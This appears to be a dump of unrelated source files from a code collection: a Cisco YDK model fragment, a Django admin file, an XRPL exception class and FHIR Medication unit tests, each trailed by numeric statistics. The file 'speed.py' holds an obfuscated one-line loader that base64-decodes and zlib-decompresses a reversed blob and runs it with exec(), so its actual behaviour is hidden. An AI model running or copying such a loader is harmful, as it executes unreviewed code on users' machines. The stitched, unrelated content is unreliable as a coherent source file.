return meta._meta_table['Vrrp.MgoSessions.MgoSession.Slave']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.MgoSessions.MgoSession']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.MgoSessions']['meta_info']
def clone_ptr(self):
self._top_entity = Vrrp()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp']['meta_info']
| 41.355305 | 1,737 | 0.466894 | 17,301 | 194,494 | 4.964858 | 0.019421 | 0.037394 | 0.028523 | 0.025426 | 0.924992 | 0.897144 | 0.878343 | 0.862743 | 0.8489 | 0.842521 | 0 | 0.03772 | 0.413056 | 194,494 | 4,702 | 1,738 | 41.3641 | 0.714726 | 0.296595 | 0 | 0.769494 | 0 | 0.002736 | 0.229189 | 0.112699 | 0.002736 | 0 | 0 | 0 | 0 | 1 | 0.073187 | false | 0 | 0.032832 | 0 | 0.184679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
aeffc39ba4336e6d623a2023586327998475d7ab | 3,407 | py | Python | speed.py | Bajingan-Z/SPEED | 83868115ee3a55e0cfdc516093774cf47b2171eb | [
"Apache-2.0"
] | 1 | 2022-03-05T20:12:21.000Z | 2022-03-05T20:12:21.000Z | speed.py | Bajingan-Z/SPEED | 83868115ee3a55e0cfdc516093774cf47b2171eb | [
"Apache-2.0"
] | null | null | null | speed.py | Bajingan-Z/SPEED | 83868115ee3a55e0cfdc516093774cf47b2171eb | [
"Apache-2.0"
] | 4 | 2022-02-10T10:05:02.000Z | 2022-03-27T23:44:47.000Z | _ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));exec((_)(b'=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'))
| 1,703.5 | 3,406 | 0.954505 | 123 | 3,407 | 26.325203 | 0.98374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16554 | 0.001761 | 3,407 | 1 | 3,407 | 3,407 | 0.786533 | 0 | 0 | 0 | 0 | 1 | 0.972703 | 0.969768 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
9dcbf86429ae73bf923dac9fad5624b1d329c9bc | 135 | py | Python | backend/apps/blogs/admin.py | hovedstyret/indok-web | 598e9ca0b5f3a5e776a85dec0a8694b9bcd5a159 | [
"MIT"
] | 3 | 2021-11-18T09:29:14.000Z | 2022-01-13T20:12:11.000Z | backend/apps/blogs/admin.py | rubberdok/indok-web | 598e9ca0b5f3a5e776a85dec0a8694b9bcd5a159 | [
"MIT"
] | 277 | 2022-01-17T18:16:44.000Z | 2022-03-31T19:44:04.000Z | backend/apps/blogs/admin.py | hovedstyret/indok-web | 598e9ca0b5f3a5e776a85dec0a8694b9bcd5a159 | [
"MIT"
] | null | null | null | from django.contrib import admin
from apps.blogs.models import Blog, BlogPost
admin.site.register(BlogPost)
admin.site.register(Blog)
| 22.5 | 44 | 0.822222 | 20 | 135 | 5.55 | 0.6 | 0.234234 | 0.306306 | 0.45045 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 135 | 5 | 45 | 27 | 0.902439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
d182afd7d895c554ab6406efa840dce58ed0fa58 | 254 | py | Python | synapse/vendor/xrpl/core/addresscodec/exceptions.py | vishalbelsare/synapse | c0f0d318cc5d3098b3a8d80222e2b0b1d19c5740 | [
"Apache-2.0"
] | 216 | 2017-01-17T18:52:50.000Z | 2022-03-31T18:44:49.000Z | synapse/vendor/xrpl/core/addresscodec/exceptions.py | vishalbelsare/synapse | c0f0d318cc5d3098b3a8d80222e2b0b1d19c5740 | [
"Apache-2.0"
] | 2,189 | 2017-01-17T22:31:48.000Z | 2022-03-31T20:41:45.000Z | synapse/vendor/xrpl/core/addresscodec/exceptions.py | vishalbelsare/synapse | c0f0d318cc5d3098b3a8d80222e2b0b1d19c5740 | [
"Apache-2.0"
] | 44 | 2017-01-17T16:50:57.000Z | 2022-03-16T18:35:52.000Z | """General XRPL Address Codec Exceptions."""
# It has been modified for vendored imports.
from synapse.vendor.xrpl.constants import XRPLException
class XRPLAddressCodecException(XRPLException):
"""General XRPL Address Codec Exception."""
pass
| 25.4 | 55 | 0.771654 | 28 | 254 | 7 | 0.785714 | 0.112245 | 0.183673 | 0.234694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141732 | 254 | 9 | 56 | 28.222222 | 0.899083 | 0.472441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
d1aebc2b7c68c32be2d1da2424b8325cd766716a | 20,755 | py | Python | fhir/resources/tests/test_medication.py | cstoltze/fhir.resources | 52f99738935b7313089d89daf94d73ce7d167c9d | [
"BSD-3-Clause"
] | 144 | 2019-05-08T14:24:43.000Z | 2022-03-30T02:37:11.000Z | fhir/resources/tests/test_medication.py | cstoltze/fhir.resources | 52f99738935b7313089d89daf94d73ce7d167c9d | [
"BSD-3-Clause"
] | 82 | 2019-05-13T17:43:13.000Z | 2022-03-30T16:45:17.000Z | fhir/resources/tests/test_medication.py | cstoltze/fhir.resources | 52f99738935b7313089d89daf94d73ce7d167c9d | [
"BSD-3-Clause"
] | 48 | 2019-04-04T14:14:53.000Z | 2022-03-30T06:07:31.000Z | # -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Medication
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
from pydantic.validators import bytes_validator # noqa: F401
from .. import fhirtypes # noqa: F401
from .. import medication
def impl_medication_1(inst):
assert inst.batch.expirationDate == fhirtypes.DateTime.validate(
"2019-10-31T11:15:33+10:00"
)
assert inst.batch.lotNumber == "12345"
assert inst.code.coding[0].code == "0169-7501-11"
assert inst.code.coding[0].display == "Novolog 100u/ml"
assert inst.code.coding[0].system == "http://hl7.org/fhir/sid/ndc"
assert inst.contained[0].id == "org3"
assert inst.form.coding[0].code == "385219001"
assert inst.form.coding[0].display == "Injection solution (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0307"
assert inst.ingredient[0].itemCodeableConcept.coding[0].code == "325072002"
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].display
== "Insulin Aspart (substance)"
)
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].system
== "http://snomed.info/sct"
)
assert inst.ingredient[0].strength.denominator.code == "mL"
assert inst.ingredient[0].strength.denominator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "U"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(100)
assert inst.manufacturer.reference == "#org3"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_1(base_settings):
"""No. 1 tests collection for Medication.
Test File: medicationexample0307.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0307.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_1(inst2)
def impl_medication_2(inst):
assert inst.code.coding[0].code == "373994007"
assert inst.code.coding[0].display == "Prednisone 5mg tablet (Product)"
assert inst.code.coding[0].system == "http://snomed.info/sct"
assert inst.contained[0].id == "sub03"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0311"
assert inst.ingredient[0].itemReference.reference == "#sub03"
assert inst.ingredient[0].strength.denominator.code == "TAB"
assert (
inst.ingredient[0].strength.denominator.system
== "http://terminology.hl7.org/CodeSystem/v3-orderableDrugForm"
)
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(5)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_2(base_settings):
"""No. 2 tests collection for Medication.
Test File: medicationexample0311.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0311.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_2(inst2)
def impl_medication_3(inst):
assert inst.code.coding[0].code == "430127000"
assert inst.code.coding[0].display == "Oral Form Oxycodone (product)"
assert inst.code.coding[0].system == "http://snomed.info/sct"
assert inst.contained[0].id == "sub03"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0310"
assert inst.ingredient[0].itemReference.reference == "#sub03"
assert inst.ingredient[0].strength.denominator.code == "TAB"
assert (
inst.ingredient[0].strength.denominator.system
== "http://terminology.hl7.org/CodeSystem/v3-orderableDrugForm"
)
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(5)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_3(base_settings):
"""No. 3 tests collection for Medication.
Test File: medicationexample0310.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0310.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_3(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_3(inst2)
def impl_medication_4(inst):
assert inst.batch.expirationDate == fhirtypes.DateTime.validate(
"2019-10-31T11:15:33+10:00"
)
assert inst.batch.lotNumber == "12345"
assert inst.code.coding[0].code == "51144-050-01"
assert inst.code.coding[0].display == "Adcetris"
assert inst.code.coding[0].system == "http://hl7.org/fhir/sid/ndc"
assert inst.contained[0].id == "org3"
assert inst.form.coding[0].code == "421637006"
assert inst.form.coding[0].display == (
"Lyophilized powder for injectable solution (qualifier value)" " "
)
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0306"
assert inst.manufacturer.reference == "#org3"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_4(base_settings):
"""No. 4 tests collection for Medication.
Test File: medicationexample0306.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0306.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_4(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_4(inst2)
def impl_medication_5(inst):
assert inst.batch.expirationDate == fhirtypes.DateTime.validate(
"2017-05-22T11:15:33+10:00"
)
assert inst.batch.lotNumber == "9494788"
assert inst.code.coding[0].code == "0069-2587-10"
assert (
inst.code.coding[0].display
== "Vancomycin Hydrochloride (VANCOMYCIN HYDROCHLORIDE)"
)
assert inst.code.coding[0].system == "http://hl7.org/fhir/sid/ndc"
assert inst.contained[0].id == "org4"
assert inst.form.coding[0].code == "385219001"
assert inst.form.coding[0].display == "Injection Solution (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0301"
assert inst.ingredient[0].isActive is True
assert inst.ingredient[0].itemCodeableConcept.coding[0].code == "66955"
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].display
== "Vancomycin Hydrochloride"
)
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].system
== "http://www.nlm.nih.gov/research/umls/rxnorm"
)
assert inst.ingredient[0].strength.denominator.code == "mL"
assert inst.ingredient[0].strength.denominator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.denominator.value) == float(10)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(500)
assert inst.manufacturer.reference == "#org4"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.status == "active"
assert inst.text.status == "generated"
def test_medication_5(base_settings):
"""No. 5 tests collection for Medication.
Test File: medicationexample0301.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0301.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_5(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_5(inst2)
def impl_medication_6(inst):
assert inst.form.coding[0].code == "385219001"
assert inst.form.coding[0].display == "Injection Solution (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.form.text == "Injection Solution (qualifier value)"
assert inst.id == "med0317"
assert inst.ingredient[0].itemCodeableConcept.coding[0].code == "204520"
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].display == "Potassium Chloride"
)
assert (
inst.ingredient[0].itemCodeableConcept.coding[0].system
== "http://www.nlm.nih.gov/research/umls/rxnorm"
)
assert inst.ingredient[0].strength.denominator.code == "mL"
assert inst.ingredient[0].strength.denominator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "meq"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(2)
assert inst.ingredient[1].itemCodeableConcept.coding[0].code == "313002"
assert (
inst.ingredient[1].itemCodeableConcept.coding[0].display
== "Sodium Chloride 0.9% injectable solution"
)
assert (
inst.ingredient[1].itemCodeableConcept.coding[0].system
== "http://www.nlm.nih.gov/research/umls/rxnorm"
)
assert inst.ingredient[1].strength.denominator.code == "mL"
assert inst.ingredient[1].strength.denominator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[1].strength.denominator.value) == float(100)
assert inst.ingredient[1].strength.numerator.code == "g"
assert inst.ingredient[1].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[1].strength.numerator.value) == float(0.9)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_6(base_settings):
"""No. 6 tests collection for Medication.
Test File: medicationexample0317.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0317.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_6(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_6(inst2)
def impl_medication_7(inst):
assert inst.code.text == "Amoxicillin 250mg/5ml Suspension"
assert inst.id == "medicationexample1"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.div == (
'<div xmlns="http://www.w3.org/1999/xhtml">Amoxicillin '
"250mg/5ml Suspension</div>"
)
assert inst.text.status == "generated"
def test_medication_7(base_settings):
"""No. 7 tests collection for Medication.
Test File: medicationexample1.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample1.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_7(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_7(inst2)
def impl_medication_8(inst):
assert inst.batch.expirationDate == fhirtypes.DateTime.validate(
"2017-05-22T11:15:33+10:00"
)
assert inst.batch.lotNumber == "9494788"
assert inst.code.coding[0].code == "213293"
assert inst.code.coding[0].display == "Capecitabine 500mg oral tablet (Xeloda)"
assert inst.code.coding[0].system == "http://www.nlm.nih.gov/research/umls/rxnorm"
assert inst.contained[0].id == "org2"
assert inst.contained[1].id == "sub04"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "medexample015"
assert inst.ingredient[0].itemReference.reference == "#sub04"
assert inst.ingredient[0].strength.denominator.code == "TAB"
assert (
inst.ingredient[0].strength.denominator.system
== "http://terminology.hl7.org/CodeSystem/v3-orderableDrugForm"
)
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(500)
assert inst.manufacturer.reference == "#org2"
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_8(base_settings):
"""No. 8 tests collection for Medication.
Test File: medicationexample15.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample15.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_8(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_8(inst2)
def impl_medication_9(inst):
assert inst.code.coding[0].code == "108761006"
assert inst.code.coding[0].display == "Capecitabine (product)"
assert inst.code.coding[0].system == "http://snomed.info/sct"
assert inst.contained[0].id == "sub03"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0321"
assert inst.ingredient[0].itemReference.reference == "#sub03"
assert inst.ingredient[0].strength.denominator.code == "385055001"
assert inst.ingredient[0].strength.denominator.system == "http://snomed.info/sct"
assert inst.ingredient[0].strength.denominator.unit == "Tablet"
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(500)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_9(base_settings):
"""No. 9 tests collection for Medication.
Test File: medicationexample0321.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0321.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_9(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_9(inst2)
def impl_medication_10(inst):
assert inst.code.coding[0].code == "324252006"
assert inst.code.coding[0].display == "Azithromycin 250mg capsule (product)"
assert inst.code.coding[0].system == "http://snomed.info/sct"
assert inst.contained[0].id == "sub03"
assert inst.form.coding[0].code == "385055001"
assert inst.form.coding[0].display == "Tablet dose form (qualifier value)"
assert inst.form.coding[0].system == "http://snomed.info/sct"
assert inst.id == "med0320"
assert inst.ingredient[0].itemReference.reference == "#sub03"
assert inst.ingredient[0].strength.denominator.code == "TAB"
assert (
inst.ingredient[0].strength.denominator.system
== "http://terminology.hl7.org/CodeSystem/v3-orderableDrugForm"
)
assert float(inst.ingredient[0].strength.denominator.value) == float(1)
assert inst.ingredient[0].strength.numerator.code == "mg"
assert inst.ingredient[0].strength.numerator.system == "http://unitsofmeasure.org"
assert float(inst.ingredient[0].strength.numerator.value) == float(250)
assert inst.meta.tag[0].code == "HTEST"
assert inst.meta.tag[0].display == "test health data"
assert (
inst.meta.tag[0].system == "http://terminology.hl7.org/CodeSystem/v3-ActReason"
)
assert inst.text.status == "generated"
def test_medication_10(base_settings):
"""No. 10 tests collection for Medication.
Test File: medicationexample0320.json
"""
filename = base_settings["unittest_data_dir"] / "medicationexample0320.json"
inst = medication.Medication.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Medication" == inst.resource_type
impl_medication_10(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Medication" == data["resourceType"]
inst2 = medication.Medication(**data)
impl_medication_10(inst2)
